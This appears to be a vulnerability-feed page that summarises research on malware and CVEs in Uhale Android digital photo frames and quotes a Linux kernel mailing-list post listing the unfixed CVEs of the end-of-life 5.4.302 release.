Recent bundles

Uhale digital frames with Android operating system have several critical vulnerabilities

2025-12-03T15:23:07 by Cédric Bonhomme

JSON

> Experts have found that many of the digital frame models analyzed download malicious payloads from Chinese servers immediately after ignition. At startup, devices check for an update of the Uhale app, install the update to version 4.2.0 and restart. After restarting, the updated app starts downloading and running the malware. > > The downloaded JAR/DEX file is saved in the Uhale application directory and run at each subsequent system start. It is not yet clear why version 4.2.0 of the application became malicious (whether this was done intentionally by the developers themselves or whether the ZEASN upgrade infrastructure was compromised). > > The malware detected has been linked to the Vo1d botnet, which has millions of devices, as well as the Mzmess family of malware. This connection is confirmed by packet prefixes, string names, endpoints, malware distribution process, and a range of artifacts. > > In addition to the automatic download of the malware (which did not occur on all the frames analyzed), the researchers also discovered numerous vulnerabilities. In their report, Quokka's specialists detailed 17 problems, 11 of which have already received CVE identifiers.

The most serious are:

CVE-2025-58392 and CVE-2025-58397 – An insecure implementation of TrustManager allows a MitM attack to inject counterfeit encrypted responses, eventually leading to remote code execution with root privileges;
CVE-2025-58388 – During an application update, raw file names are passed directly to shell commands, allowing command injection and remote installation of arbitrary APKs;
CVE-2025-58394 – All the camera frames tested were shipped with disabled SELinux, default root access and AOSP public test keys, which means they were completely compromised from the first moment;
CVE-2025-58396 – A pre-installed application launches a file server on the TCP 17802 port, which accepts file uploads without authentication. As a result, any host on the local network gets the ability to write or delete arbitrary files on your device;
CVE-2025-58390 – WebView in the app ignores SSL/TLS errors and allows mixed content, allowing attackers to inject or intercept data viewed on the device, opening the door to phishing and content spoofing.

The LAST Linux 5.4.y release. It is now end-of-life and should not be > used by anyone, anymore. Some CVEs...

2025-12-03T14:14:49 by Alexandre Dulaunoy

JSON

Re: Linux 5.4.302 - Greg Kroah-Hartman

From: Greg Kroah-Hartman &lt;gregkh@linuxfoundation.org&gt;
To: linux-kernel@vger.kernel.org, akpm@linux-foundation.org,
    torvalds@linux-foundation.org, stable@vger.kernel.org
Cc: lwn@lwn.net, jslaby@suse.cz
Subject: Re: Linux 5.4.302
Date: Wed, 3 Dec 2025 13:50:40 +0100    [thread overview]
Message-ID: &lt;2025120358-skating-outage-7c61@gregkh&gt; (raw)
In-Reply-To: &lt;2025120319-blip-grime-93e8@gregkh&gt;

On Wed, Dec 03, 2025 at 01:12:32PM +0100, Greg Kroah-Hartman wrote:
&gt; I'm announcing the release of the 5.4.302 kernel.
&gt; 
&gt; This is the LAST 5.4.y release.  It is now end-of-life and should not be
&gt; used by anyone, anymore.  As of this point in time, there are 1539
&gt; documented unfixed CVEs for this kernel branch, and that number will
&gt; only increase over time as more CVEs get assigned for kernel bugs.

And here's that list, if anyone is curious:

    5.4.302 is vulnerable to CVE-2020-36776
    5.4.302 is vulnerable to CVE-2020-36784
    5.4.302 is vulnerable to CVE-2020-36788
    5.4.302 is vulnerable to CVE-2021-46925
    5.4.302 is vulnerable to CVE-2021-46926
    5.4.302 is vulnerable to CVE-2021-46928
    5.4.302 is vulnerable to CVE-2021-46941
    5.4.302 is vulnerable to CVE-2021-46987
    5.4.302 is vulnerable to CVE-2021-47001
    5.4.302 is vulnerable to CVE-2021-47004
    5.4.302 is vulnerable to CVE-2021-47005
    5.4.302 is vulnerable to CVE-2021-47024
    5.4.302 is vulnerable to CVE-2021-47049
    5.4.302 is vulnerable to CVE-2021-47061
    5.4.302 is vulnerable to CVE-2021-47063
    5.4.302 is vulnerable to CVE-2021-47070
    5.4.302 is vulnerable to CVE-2021-47074
    5.4.302 is vulnerable to CVE-2021-47076
    5.4.302 is vulnerable to CVE-2021-47077
    5.4.302 is vulnerable to CVE-2021-47101
    5.4.302 is vulnerable to CVE-2021-47113
    5.4.302 is vulnerable to CVE-2021-47116
    5.4.302 is vulnerable to CVE-2021-47119
    5.4.302 is vulnerable to CVE-2021-47131
    5.4.302 is vulnerable to CVE-2021-47143
    5.4.302 is vulnerable to CVE-2021-47158
    5.4.302 is vulnerable to CVE-2021-47182
    5.4.302 is vulnerable to CVE-2021-47183
    5.4.302 is vulnerable to CVE-2021-47188
    5.4.302 is vulnerable to CVE-2021-47191
    5.4.302 is vulnerable to CVE-2021-47193
    5.4.302 is vulnerable to CVE-2021-47198
    5.4.302 is vulnerable to CVE-2021-47205
    5.4.302 is vulnerable to CVE-2021-47211
    5.4.302 is vulnerable to CVE-2021-47212
    5.4.302 is vulnerable to CVE-2021-47219
    5.4.302 is vulnerable to CVE-2021-47226
    5.4.302 is vulnerable to CVE-2021-47234
    5.4.302 is vulnerable to CVE-2021-47247
    5.4.302 is vulnerable to CVE-2021-47253
    5.4.302 is vulnerable to CVE-2021-47265
    5.4.302 is vulnerable to CVE-2021-47275
    5.4.302 is vulnerable to CVE-2021-47281
    5.4.302 is vulnerable to CVE-2021-47283
    5.4.302 is vulnerable to CVE-2021-47331
    5.4.302 is vulnerable to CVE-2021-47335
    5.4.302 is vulnerable to CVE-2021-47339
    5.4.302 is vulnerable to CVE-2021-47359
    5.4.302 is vulnerable to CVE-2021-47362
    5.4.302 is vulnerable to CVE-2021-47366
    5.4.302 is vulnerable to CVE-2021-47378
    5.4.302 is vulnerable to CVE-2021-47381
    5.4.302 is vulnerable to CVE-2021-47391
    5.4.302 is vulnerable to CVE-2021-47399
    5.4.302 is vulnerable to CVE-2021-47407
    5.4.302 is vulnerable to CVE-2021-47408
    5.4.302 is vulnerable to CVE-2021-47410
    5.4.302 is vulnerable to CVE-2021-47412
    5.4.302 is vulnerable to CVE-2021-47414
    5.4.302 is vulnerable to CVE-2021-47428
    5.4.302 is vulnerable to CVE-2021-47432
    5.4.302 is vulnerable to CVE-2021-47433
    5.4.302 is vulnerable to CVE-2021-47438
    5.4.302 is vulnerable to CVE-2021-47452
    5.4.302 is vulnerable to CVE-2021-47455
    5.4.302 is vulnerable to CVE-2021-47473
    5.4.302 is vulnerable to CVE-2021-47479
    5.4.302 is vulnerable to CVE-2021-47490
    5.4.302 is vulnerable to CVE-2021-47491
    5.4.302 is vulnerable to CVE-2021-47492
    5.4.302 is vulnerable to CVE-2021-47493
    5.4.302 is vulnerable to CVE-2021-47498
    5.4.302 is vulnerable to CVE-2021-47501
    5.4.302 is vulnerable to CVE-2021-47504
    5.4.302 is vulnerable to CVE-2021-47508
    5.4.302 is vulnerable to CVE-2021-47523
    5.4.302 is vulnerable to CVE-2021-47544
    5.4.302 is vulnerable to CVE-2021-47552
    5.4.302 is vulnerable to CVE-2021-47559
    5.4.302 is vulnerable to CVE-2021-47560
    5.4.302 is vulnerable to CVE-2021-47577
    5.4.302 is vulnerable to CVE-2021-47578
    5.4.302 is vulnerable to CVE-2021-47580
    5.4.302 is vulnerable to CVE-2021-47582
    5.4.302 is vulnerable to CVE-2021-47599
    5.4.302 is vulnerable to CVE-2021-47610
    5.4.302 is vulnerable to CVE-2021-47618
    5.4.302 is vulnerable to CVE-2021-47622
    5.4.302 is vulnerable to CVE-2021-47623
    5.4.302 is vulnerable to CVE-2021-47632
    5.4.302 is vulnerable to CVE-2021-47635
    5.4.302 is vulnerable to CVE-2021-47648
    5.4.302 is vulnerable to CVE-2021-47653
    5.4.302 is vulnerable to CVE-2022-48628
    5.4.302 is vulnerable to CVE-2022-48633
    5.4.302 is vulnerable to CVE-2022-48642
    5.4.302 is vulnerable to CVE-2022-48664
    5.4.302 is vulnerable to CVE-2022-48673
    5.4.302 is vulnerable to CVE-2022-48674
    5.4.302 is vulnerable to CVE-2022-48706
    5.4.302 is vulnerable to CVE-2022-48712
    5.4.302 is vulnerable to CVE-2022-48721
    5.4.302 is vulnerable to CVE-2022-48733
    5.4.302 is vulnerable to CVE-2022-48740
    5.4.302 is vulnerable to CVE-2022-48744
    5.4.302 is vulnerable to CVE-2022-48751
    5.4.302 is vulnerable to CVE-2022-48755
    5.4.302 is vulnerable to CVE-2022-48761
    5.4.302 is vulnerable to CVE-2022-48763
    5.4.302 is vulnerable to CVE-2022-48765
    5.4.302 is vulnerable to CVE-2022-48769
    5.4.302 is vulnerable to CVE-2022-48791
    5.4.302 is vulnerable to CVE-2022-48792
    5.4.302 is vulnerable to CVE-2022-48796
    5.4.302 is vulnerable to CVE-2022-48802
    5.4.302 is vulnerable to CVE-2022-48811
    5.4.302 is vulnerable to CVE-2022-48825
    5.4.302 is vulnerable to CVE-2022-48826
    5.4.302 is vulnerable to CVE-2022-48827
    5.4.302 is vulnerable to CVE-2022-48833
    5.4.302 is vulnerable to CVE-2022-48844
    5.4.302 is vulnerable to CVE-2022-48852
    5.4.302 is vulnerable to CVE-2022-48863
    5.4.302 is vulnerable to CVE-2022-48865
    5.4.302 is vulnerable to CVE-2022-48875
    5.4.302 is vulnerable to CVE-2022-48887
    5.4.302 is vulnerable to CVE-2022-48893
    5.4.302 is vulnerable to CVE-2022-48901
    5.4.302 is vulnerable to CVE-2022-48902
    5.4.302 is vulnerable to CVE-2022-48909
    5.4.302 is vulnerable to CVE-2022-48920
    5.4.302 is vulnerable to CVE-2022-48943
    5.4.302 is vulnerable to CVE-2022-48950
    5.4.302 is vulnerable to CVE-2022-48952
    5.4.302 is vulnerable to CVE-2022-48953
    5.4.302 is vulnerable to CVE-2022-48961
    5.4.302 is vulnerable to CVE-2022-48975
    5.4.302 is vulnerable to CVE-2022-48979
    5.4.302 is vulnerable to CVE-2022-49000
    5.4.302 is vulnerable to CVE-2022-49026
    5.4.302 is vulnerable to CVE-2022-49027
    5.4.302 is vulnerable to CVE-2022-49028
    5.4.302 is vulnerable to CVE-2022-49046
    5.4.302 is vulnerable to CVE-2022-49054
    5.4.302 is vulnerable to CVE-2022-49065
    5.4.302 is vulnerable to CVE-2022-49069
    5.4.302 is vulnerable to CVE-2022-49072
    5.4.302 is vulnerable to CVE-2022-49097
    5.4.302 is vulnerable to CVE-2022-49102
    5.4.302 is vulnerable to CVE-2022-49103
    5.4.302 is vulnerable to CVE-2022-49104
    5.4.302 is vulnerable to CVE-2022-49106
    5.4.302 is vulnerable to CVE-2022-49107
    5.4.302 is vulnerable to CVE-2022-49109
    5.4.302 is vulnerable to CVE-2022-49110
    5.4.302 is vulnerable to CVE-2022-49112
    5.4.302 is vulnerable to CVE-2022-49118
    5.4.302 is vulnerable to CVE-2022-49119
    5.4.302 is vulnerable to CVE-2022-49120
    5.4.302 is vulnerable to CVE-2022-49121
    5.4.302 is vulnerable to CVE-2022-49124
    5.4.302 is vulnerable to CVE-2022-49129
    5.4.302 is vulnerable to CVE-2022-49134
    5.4.302 is vulnerable to CVE-2022-49135
    5.4.302 is vulnerable to CVE-2022-49138
    5.4.302 is vulnerable to CVE-2022-49142
    5.4.302 is vulnerable to CVE-2022-49149
    5.4.302 is vulnerable to CVE-2022-49154
    5.4.302 is vulnerable to CVE-2022-49156
    5.4.302 is vulnerable to CVE-2022-49157
    5.4.302 is vulnerable to CVE-2022-49158
    5.4.302 is vulnerable to CVE-2022-49161
    5.4.302 is vulnerable to CVE-2022-49164
    5.4.302 is vulnerable to CVE-2022-49168
    5.4.302 is vulnerable to CVE-2022-49169
    5.4.302 is vulnerable to CVE-2022-49170
    5.4.302 is vulnerable to CVE-2022-49172
    5.4.302 is vulnerable to CVE-2022-49174
    5.4.302 is vulnerable to CVE-2022-49178
    5.4.302 is vulnerable to CVE-2022-49182
    5.4.302 is vulnerable to CVE-2022-49188
    5.4.302 is vulnerable to CVE-2022-49190
    5.4.302 is vulnerable to CVE-2022-49194
    5.4.302 is vulnerable to CVE-2022-49196
    5.4.302 is vulnerable to CVE-2022-49201
    5.4.302 is vulnerable to CVE-2022-49215
    5.4.302 is vulnerable to CVE-2022-49219
    5.4.302 is vulnerable to CVE-2022-49226
    5.4.302 is vulnerable to CVE-2022-49234
    5.4.302 is vulnerable to CVE-2022-49241
    5.4.302 is vulnerable to CVE-2022-49246
    5.4.302 is vulnerable to CVE-2022-49258
    5.4.302 is vulnerable to CVE-2022-49267
    5.4.302 is vulnerable to CVE-2022-49281
    5.4.302 is vulnerable to CVE-2022-49285
    5.4.302 is vulnerable to CVE-2022-49289
    5.4.302 is vulnerable to CVE-2022-49294
    5.4.302 is vulnerable to CVE-2022-49296
    5.4.302 is vulnerable to CVE-2022-49303
    5.4.302 is vulnerable to CVE-2022-49309
    5.4.302 is vulnerable to CVE-2022-49311
    5.4.302 is vulnerable to CVE-2022-49312
    5.4.302 is vulnerable to CVE-2022-49317
    5.4.302 is vulnerable to CVE-2022-49319
    5.4.302 is vulnerable to CVE-2022-49323
    5.4.302 is vulnerable to CVE-2022-49325
    5.4.302 is vulnerable to CVE-2022-49327
    5.4.302 is vulnerable to CVE-2022-49328
    5.4.302 is vulnerable to CVE-2022-49342
    5.4.302 is vulnerable to CVE-2022-49360
    5.4.302 is vulnerable to CVE-2022-49361
    5.4.302 is vulnerable to CVE-2022-49376
    5.4.302 is vulnerable to CVE-2022-49390
    5.4.302 is vulnerable to CVE-2022-49398
    5.4.302 is vulnerable to CVE-2022-49420
    5.4.302 is vulnerable to CVE-2022-49428
    5.4.302 is vulnerable to CVE-2022-49430
    5.4.302 is vulnerable to CVE-2022-49437
    5.4.302 is vulnerable to CVE-2022-49440
    5.4.302 is vulnerable to CVE-2022-49443
    5.4.302 is vulnerable to CVE-2022-49444
    5.4.302 is vulnerable to CVE-2022-49445
    5.4.302 is vulnerable to CVE-2022-49449
    5.4.302 is vulnerable to CVE-2022-49453
    5.4.302 is vulnerable to CVE-2022-49465
    5.4.302 is vulnerable to CVE-2022-49468
    5.4.302 is vulnerable to CVE-2022-49470
    5.4.302 is vulnerable to CVE-2022-49496
    5.4.302 is vulnerable to CVE-2022-49497
    5.4.302 is vulnerable to CVE-2022-49502
    5.4.302 is vulnerable to CVE-2022-49504
    5.4.302 is vulnerable to CVE-2022-49512
    5.4.302 is vulnerable to CVE-2022-49513
    5.4.302 is vulnerable to CVE-2022-49519
    5.4.302 is vulnerable to CVE-2022-49521
    5.4.302 is vulnerable to CVE-2022-49528
    5.4.302 is vulnerable to CVE-2022-49531
    5.4.302 is vulnerable to CVE-2022-49534
    5.4.302 is vulnerable to CVE-2022-49535
    5.4.302 is vulnerable to CVE-2022-49536
    5.4.302 is vulnerable to CVE-2022-49540
    5.4.302 is vulnerable to CVE-2022-49541
    5.4.302 is vulnerable to CVE-2022-49542
    5.4.302 is vulnerable to CVE-2022-49545
    5.4.302 is vulnerable to CVE-2022-49546
    5.4.302 is vulnerable to CVE-2022-49555
    5.4.302 is vulnerable to CVE-2022-49562
    5.4.302 is vulnerable to CVE-2022-49563
    5.4.302 is vulnerable to CVE-2022-49564
    5.4.302 is vulnerable to CVE-2022-49566
    5.4.302 is vulnerable to CVE-2022-49578
    5.4.302 is vulnerable to CVE-2022-49579
    5.4.302 is vulnerable to CVE-2022-49585
    5.4.302 is vulnerable to CVE-2022-49599
    5.4.302 is vulnerable to CVE-2022-49603
    5.4.302 is vulnerable to CVE-2022-49610
    5.4.302 is vulnerable to CVE-2022-49618
    5.4.302 is vulnerable to CVE-2022-49622
    5.4.302 is vulnerable to CVE-2022-49623
    5.4.302 is vulnerable to CVE-2022-49630
    5.4.302 is vulnerable to CVE-2022-49632
    5.4.302 is vulnerable to CVE-2022-49635
    5.4.302 is vulnerable to CVE-2022-49640
    5.4.302 is vulnerable to CVE-2022-49641
    5.4.302 is vulnerable to CVE-2022-49650
    5.4.302 is vulnerable to CVE-2022-49651
    5.4.302 is vulnerable to CVE-2022-49658
    5.4.302 is vulnerable to CVE-2022-49664
    5.4.302 is vulnerable to CVE-2022-49666
    5.4.302 is vulnerable to CVE-2022-49696
    5.4.302 is vulnerable to CVE-2022-49698
    5.4.302 is vulnerable to CVE-2022-49711
    5.4.302 is vulnerable to CVE-2022-49720
    5.4.302 is vulnerable to CVE-2022-49723
    5.4.302 is vulnerable to CVE-2022-49728
    5.4.302 is vulnerable to CVE-2022-49730
    5.4.302 is vulnerable to CVE-2022-49742
    5.4.302 is vulnerable to CVE-2022-49743
    5.4.302 is vulnerable to CVE-2022-49749
    5.4.302 is vulnerable to CVE-2022-49758
    5.4.302 is vulnerable to CVE-2022-49761
    5.4.302 is vulnerable to CVE-2022-49764
    5.4.302 is vulnerable to CVE-2022-49765
    5.4.302 is vulnerable to CVE-2022-49766
    5.4.302 is vulnerable to CVE-2022-49799
    5.4.302 is vulnerable to CVE-2022-49812
    5.4.302 is vulnerable to CVE-2022-49813
    5.4.302 is vulnerable to CVE-2022-49822
    5.4.302 is vulnerable to CVE-2022-49823
    5.4.302 is vulnerable to CVE-2022-49824
    5.4.302 is vulnerable to CVE-2022-49825
    5.4.302 is vulnerable to CVE-2022-49828
    5.4.302 is vulnerable to CVE-2022-49829
    5.4.302 is vulnerable to CVE-2022-49831
    5.4.302 is vulnerable to CVE-2022-49837
    5.4.302 is vulnerable to CVE-2022-49838
    5.4.302 is vulnerable to CVE-2022-49839
    5.4.302 is vulnerable to CVE-2022-49851
    5.4.302 is vulnerable to CVE-2022-49873
    5.4.302 is vulnerable to CVE-2022-49885
    5.4.302 is vulnerable to CVE-2022-49892
    5.4.302 is vulnerable to CVE-2022-49898
    5.4.302 is vulnerable to CVE-2022-49899
    5.4.302 is vulnerable to CVE-2022-49900
    5.4.302 is vulnerable to CVE-2022-49901
    5.4.302 is vulnerable to CVE-2022-49923
    5.4.302 is vulnerable to CVE-2022-49924
    5.4.302 is vulnerable to CVE-2022-49932
    5.4.302 is vulnerable to CVE-2022-49935
    5.4.302 is vulnerable to CVE-2022-49937
    5.4.302 is vulnerable to CVE-2022-49938
    5.4.302 is vulnerable to CVE-2022-49967
    5.4.302 is vulnerable to CVE-2022-49979
    5.4.302 is vulnerable to CVE-2022-49980
    5.4.302 is vulnerable to CVE-2022-49989
    5.4.302 is vulnerable to CVE-2022-49997
    5.4.302 is vulnerable to CVE-2022-49998
    5.4.302 is vulnerable to CVE-2022-50009
    5.4.302 is vulnerable to CVE-2022-50011
    5.4.302 is vulnerable to CVE-2022-50015
    5.4.302 is vulnerable to CVE-2022-50016
    5.4.302 is vulnerable to CVE-2022-50021
    5.4.302 is vulnerable to CVE-2022-50023
    5.4.302 is vulnerable to CVE-2022-50024
    5.4.302 is vulnerable to CVE-2022-50036
    5.4.302 is vulnerable to CVE-2022-50053
    5.4.302 is vulnerable to CVE-2022-50060
    5.4.302 is vulnerable to CVE-2022-50065
    5.4.302 is vulnerable to CVE-2022-50066
    5.4.302 is vulnerable to CVE-2022-50073
    5.4.302 is vulnerable to CVE-2022-50082
    5.4.302 is vulnerable to CVE-2022-50086
    5.4.302 is vulnerable to CVE-2022-50098
    5.4.302 is vulnerable to CVE-2022-50103
    5.4.302 is vulnerable to CVE-2022-50114
    5.4.302 is vulnerable to CVE-2022-50116
    5.4.302 is vulnerable to CVE-2022-50120
    5.4.302 is vulnerable to CVE-2022-50129
    5.4.302 is vulnerable to CVE-2022-50132
    5.4.302 is vulnerable to CVE-2022-50138
    5.4.302 is vulnerable to CVE-2022-50144
    5.4.302 is vulnerable to CVE-2022-50146
    5.4.302 is vulnerable to CVE-2022-50151
    5.4.302 is vulnerable to CVE-2022-50159
    5.4.302 is vulnerable to CVE-2022-50163
    5.4.302 is vulnerable to CVE-2022-50166
    5.4.302 is vulnerable to CVE-2022-50167
    5.4.302 is vulnerable to CVE-2022-50172
    5.4.302 is vulnerable to CVE-2022-50174
    5.4.302 is vulnerable to CVE-2022-50175
    5.4.302 is vulnerable to CVE-2022-50181
    5.4.302 is vulnerable to CVE-2022-50204
    5.4.302 is vulnerable to CVE-2022-50224
    5.4.302 is vulnerable to CVE-2022-50226
    5.4.302 is vulnerable to CVE-2022-50233
    5.4.302 is vulnerable to CVE-2022-50236
    5.4.302 is vulnerable to CVE-2022-50241
    5.4.302 is vulnerable to CVE-2022-50256
    5.4.302 is vulnerable to CVE-2022-50260
    5.4.302 is vulnerable to CVE-2022-50266
    5.4.302 is vulnerable to CVE-2022-50267
    5.4.302 is vulnerable to CVE-2022-50293
    5.4.302 is vulnerable to CVE-2022-50300
    5.4.302 is vulnerable to CVE-2022-50303
    5.4.302 is vulnerable to CVE-2022-50304
    5.4.302 is vulnerable to CVE-2022-50306
    5.4.302 is vulnerable to CVE-2022-50316
    5.4.302 is vulnerable to CVE-2022-50320
    5.4.302 is vulnerable to CVE-2022-50328
    5.4.302 is vulnerable to CVE-2022-50335
    5.4.302 is vulnerable to CVE-2022-50340
    5.4.302 is vulnerable to CVE-2022-50350
    5.4.302 is vulnerable to CVE-2022-50356
    5.4.302 is vulnerable to CVE-2022-50364
    5.4.302 is vulnerable to CVE-2022-50369
    5.4.302 is vulnerable to CVE-2022-50373
    5.4.302 is vulnerable to CVE-2022-50374
    5.4.302 is vulnerable to CVE-2022-50378
    5.4.302 is vulnerable to CVE-2022-50385
    5.4.302 is vulnerable to CVE-2022-50388
    5.4.302 is vulnerable to CVE-2022-50392
    5.4.302 is vulnerable to CVE-2022-50393
    5.4.302 is vulnerable to CVE-2022-50400
    5.4.302 is vulnerable to CVE-2022-50406
    5.4.302 is vulnerable to CVE-2022-50407
    5.4.302 is vulnerable to CVE-2022-50410
    5.4.302 is vulnerable to CVE-2022-50412
    5.4.302 is vulnerable to CVE-2022-50417
    5.4.302 is vulnerable to CVE-2022-50443
    5.4.302 is vulnerable to CVE-2022-50445
    5.4.302 is vulnerable to CVE-2022-50453
    5.4.302 is vulnerable to CVE-2022-50467
    5.4.302 is vulnerable to CVE-2022-50469
    5.4.302 is vulnerable to CVE-2022-50471
    5.4.302 is vulnerable to CVE-2022-50472
    5.4.302 is vulnerable to CVE-2022-50488
    5.4.302 is vulnerable to CVE-2022-50492
    5.4.302 is vulnerable to CVE-2022-50493
    5.4.302 is vulnerable to CVE-2022-50500
    5.4.302 is vulnerable to CVE-2022-50512
    5.4.302 is vulnerable to CVE-2022-50516
    5.4.302 is vulnerable to CVE-2022-50518
    5.4.302 is vulnerable to CVE-2022-50527
    5.4.302 is vulnerable to CVE-2022-50539
    5.4.302 is vulnerable to CVE-2022-50550
    5.4.302 is vulnerable to CVE-2022-50552
    5.4.302 is vulnerable to CVE-2022-50554
    5.4.302 is vulnerable to CVE-2022-50556
    5.4.302 is vulnerable to CVE-2022-50560
    5.4.302 is vulnerable to CVE-2022-50562
    5.4.302 is vulnerable to CVE-2022-50571
    5.4.302 is vulnerable to CVE-2022-50580
    5.4.302 is vulnerable to CVE-2022-50582
    5.4.302 is vulnerable to CVE-2023-52458
    5.4.302 is vulnerable to CVE-2023-52474
    5.4.302 is vulnerable to CVE-2023-52476
    5.4.302 is vulnerable to CVE-2023-52481
    5.4.302 is vulnerable to CVE-2023-52482
    5.4.302 is vulnerable to CVE-2023-52484
    5.4.302 is vulnerable to CVE-2023-52485
    5.4.302 is vulnerable to CVE-2023-52488
    5.4.302 is vulnerable to CVE-2023-52489
    5.4.302 is vulnerable to CVE-2023-52491
    5.4.302 is vulnerable to CVE-2023-52498
    5.4.302 is vulnerable to CVE-2023-52500
    5.4.302 is vulnerable to CVE-2023-52511
    5.4.302 is vulnerable to CVE-2023-52515
    5.4.302 is vulnerable to CVE-2023-52516
    5.4.302 is vulnerable to CVE-2023-52517
    5.4.302 is vulnerable to CVE-2023-52531
    5.4.302 is vulnerable to CVE-2023-52561
    5.4.302 is vulnerable to CVE-2023-52586
    5.4.302 is vulnerable to CVE-2023-52588
    5.4.302 is vulnerable to CVE-2023-52590
    5.4.302 is vulnerable to CVE-2023-52591
    5.4.302 is vulnerable to CVE-2023-52596
    5.4.302 is vulnerable to CVE-2023-52610
    5.4.302 is vulnerable to CVE-2023-52614
    5.4.302 is vulnerable to CVE-2023-52621
    5.4.302 is vulnerable to CVE-2023-52624
    5.4.302 is vulnerable to CVE-2023-52625
    5.4.302 is vulnerable to CVE-2023-52629
    5.4.302 is vulnerable to CVE-2023-52633
    5.4.302 is vulnerable to CVE-2023-52635
    5.4.302 is vulnerable to CVE-2023-52638
    5.4.302 is vulnerable to CVE-2023-52639
    5.4.302 is vulnerable to CVE-2023-52642
    5.4.302 is vulnerable to CVE-2023-52652
    5.4.302 is vulnerable to CVE-2023-52653
    5.4.302 is vulnerable to CVE-2023-52664
    5.4.302 is vulnerable to CVE-2023-52669
    5.4.302 is vulnerable to CVE-2023-52671
    5.4.302 is vulnerable to CVE-2023-52674
    5.4.302 is vulnerable to CVE-2023-52680
    5.4.302 is vulnerable to CVE-2023-52700
    5.4.302 is vulnerable to CVE-2023-52732
    5.4.302 is vulnerable to CVE-2023-52736
    5.4.302 is vulnerable to CVE-2023-52737
    5.4.302 is vulnerable to CVE-2023-52741
    5.4.302 is vulnerable to CVE-2023-52750
    5.4.302 is vulnerable to CVE-2023-52751
    5.4.302 is vulnerable to CVE-2023-52752
    5.4.302 is vulnerable to CVE-2023-52754
    5.4.302 is vulnerable to CVE-2023-52757
    5.4.302 is vulnerable to CVE-2023-52761
    5.4.302 is vulnerable to CVE-2023-52762
    5.4.302 is vulnerable to CVE-2023-52763
    5.4.302 is vulnerable to CVE-2023-52766
    5.4.302 is vulnerable to CVE-2023-52781
    5.4.302 is vulnerable to CVE-2023-52808
    5.4.302 is vulnerable to CVE-2023-52811
    5.4.302 is vulnerable to CVE-2023-52812
    5.4.302 is vulnerable to CVE-2023-52814
    5.4.302 is vulnerable to CVE-2023-52815
    5.4.302 is vulnerable to CVE-2023-52821
    5.4.302 is vulnerable to CVE-2023-52826
    5.4.302 is vulnerable to CVE-2023-52828
    5.4.302 is vulnerable to CVE-2023-52831
    5.4.302 is vulnerable to CVE-2023-52833
    5.4.302 is vulnerable to CVE-2023-52834
    5.4.302 is vulnerable to CVE-2023-52854
    5.4.302 is vulnerable to CVE-2023-52878
    5.4.302 is vulnerable to CVE-2023-52886
    5.4.302 is vulnerable to CVE-2023-52888
    5.4.302 is vulnerable to CVE-2023-52903
    5.4.302 is vulnerable to CVE-2023-52916
    5.4.302 is vulnerable to CVE-2023-52920
    5.4.302 is vulnerable to CVE-2023-52925
    5.4.302 is vulnerable to CVE-2023-52926
    5.4.302 is vulnerable to CVE-2023-52939
    5.4.302 is vulnerable to CVE-2023-52975
    5.4.302 is vulnerable to CVE-2023-53008
    5.4.302 is vulnerable to CVE-2023-53010
    5.4.302 is vulnerable to CVE-2023-53020
    5.4.302 is vulnerable to CVE-2023-53038
    5.4.302 is vulnerable to CVE-2023-53039
    5.4.302 is vulnerable to CVE-2023-53042
    5.4.302 is vulnerable to CVE-2023-53054
    5.4.302 is vulnerable to CVE-2023-53068
    5.4.302 is vulnerable to CVE-2023-53074
    5.4.302 is vulnerable to CVE-2023-53079
    5.4.302 is vulnerable to CVE-2023-53080
    5.4.302 is vulnerable to CVE-2023-53091
    5.4.302 is vulnerable to CVE-2023-53093
    5.4.302 is vulnerable to CVE-2023-53094
    5.4.302 is vulnerable to CVE-2023-53097
    5.4.302 is vulnerable to CVE-2023-53098
    5.4.302 is vulnerable to CVE-2023-53103
    5.4.302 is vulnerable to CVE-2023-53105
    5.4.302 is vulnerable to CVE-2023-53111
    5.4.302 is vulnerable to CVE-2023-53131
    5.4.302 is vulnerable to CVE-2023-53133
    5.4.302 is vulnerable to CVE-2023-53149
    5.4.302 is vulnerable to CVE-2023-53152
    5.4.302 is vulnerable to CVE-2023-53171
    5.4.302 is vulnerable to CVE-2023-53173
    5.4.302 is vulnerable to CVE-2023-53178
    5.4.302 is vulnerable to CVE-2023-53183
    5.4.302 is vulnerable to CVE-2023-53197
    5.4.302 is vulnerable to CVE-2023-53200
    5.4.302 is vulnerable to CVE-2023-53201
    5.4.302 is vulnerable to CVE-2023-53209
    5.4.302 is vulnerable to CVE-2023-53217
    5.4.302 is vulnerable to CVE-2023-53218
    5.4.302 is vulnerable to CVE-2023-53225
    5.4.302 is vulnerable to CVE-2023-53230
    5.4.302 is vulnerable to CVE-2023-53231
    5.4.302 is vulnerable to CVE-2023-53241
    5.4.302 is vulnerable to CVE-2023-53244
    5.4.302 is vulnerable to CVE-2023-53247
    5.4.302 is vulnerable to CVE-2023-53248
    5.4.302 is vulnerable to CVE-2023-53249
    5.4.302 is vulnerable to CVE-2023-53250
    5.4.302 is vulnerable to CVE-2023-53254
    5.4.302 is vulnerable to CVE-2023-53257
    5.4.302 is vulnerable to CVE-2023-53261
    5.4.302 is vulnerable to CVE-2023-53270
    5.4.302 is vulnerable to CVE-2023-53279
    5.4.302 is vulnerable to CVE-2023-53282
    5.4.302 is vulnerable to CVE-2023-53286
    5.4.302 is vulnerable to CVE-2023-53287
    5.4.302 is vulnerable to CVE-2023-53292
    5.4.302 is vulnerable to CVE-2023-53326
    5.4.302 is vulnerable to CVE-2023-53332
    5.4.302 is vulnerable to CVE-2023-53334
    5.4.302 is vulnerable to CVE-2023-53335
    5.4.302 is vulnerable to CVE-2023-53347
    5.4.302 is vulnerable to CVE-2023-53348
    5.4.302 is vulnerable to CVE-2023-53353
    5.4.302 is vulnerable to CVE-2023-53355
    5.4.302 is vulnerable to CVE-2023-53359
    5.4.302 is vulnerable to CVE-2023-53367
    5.4.302 is vulnerable to CVE-2023-53370
    5.4.302 is vulnerable to CVE-2023-53383
    5.4.302 is vulnerable to CVE-2023-53387
    5.4.302 is vulnerable to CVE-2023-53390
    5.4.302 is vulnerable to CVE-2023-53391
    5.4.302 is vulnerable to CVE-2023-53393
    5.4.302 is vulnerable to CVE-2023-53402
    5.4.302 is vulnerable to CVE-2023-53403
    5.4.302 is vulnerable to CVE-2023-53404
    5.4.302 is vulnerable to CVE-2023-53405
    5.4.302 is vulnerable to CVE-2023-53406
    5.4.302 is vulnerable to CVE-2023-53407
    5.4.302 is vulnerable to CVE-2023-53408
    5.4.302 is vulnerable to CVE-2023-53409
    5.4.302 is vulnerable to CVE-2023-53410
    5.4.302 is vulnerable to CVE-2023-53411
    5.4.302 is vulnerable to CVE-2023-53412
